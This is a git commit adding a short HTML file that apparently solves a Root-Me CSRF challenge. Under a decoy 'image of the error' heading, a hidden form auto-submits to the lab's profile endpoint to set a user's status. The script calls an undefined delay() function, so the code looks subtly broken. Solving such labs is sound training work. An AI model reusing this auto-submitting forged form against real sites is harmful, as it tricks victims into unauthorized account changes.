Pour un chall root-me
continuous-integration/drone/push Build is passing

This commit is contained in:
2024-09-13 22:50:49 +02:00
parent b50919e06f
commit 04ee3e3418
+13
View File
@@ -0,0 +1,13 @@
<h1>Ci-dessous L'image de l'erreur</h1>
<form id="pl" method="POST" action="http://challenge01.root-me.org/web-client/ch22/index.php?action=profile">
<input hidden name="username" value="a">
<input hidden name="status" value="on">
</form>
<script>
await delay(5000);
console.log("Waited 5s");
form_pl = document.getElementById("pl");
form_pl.submit();
</script>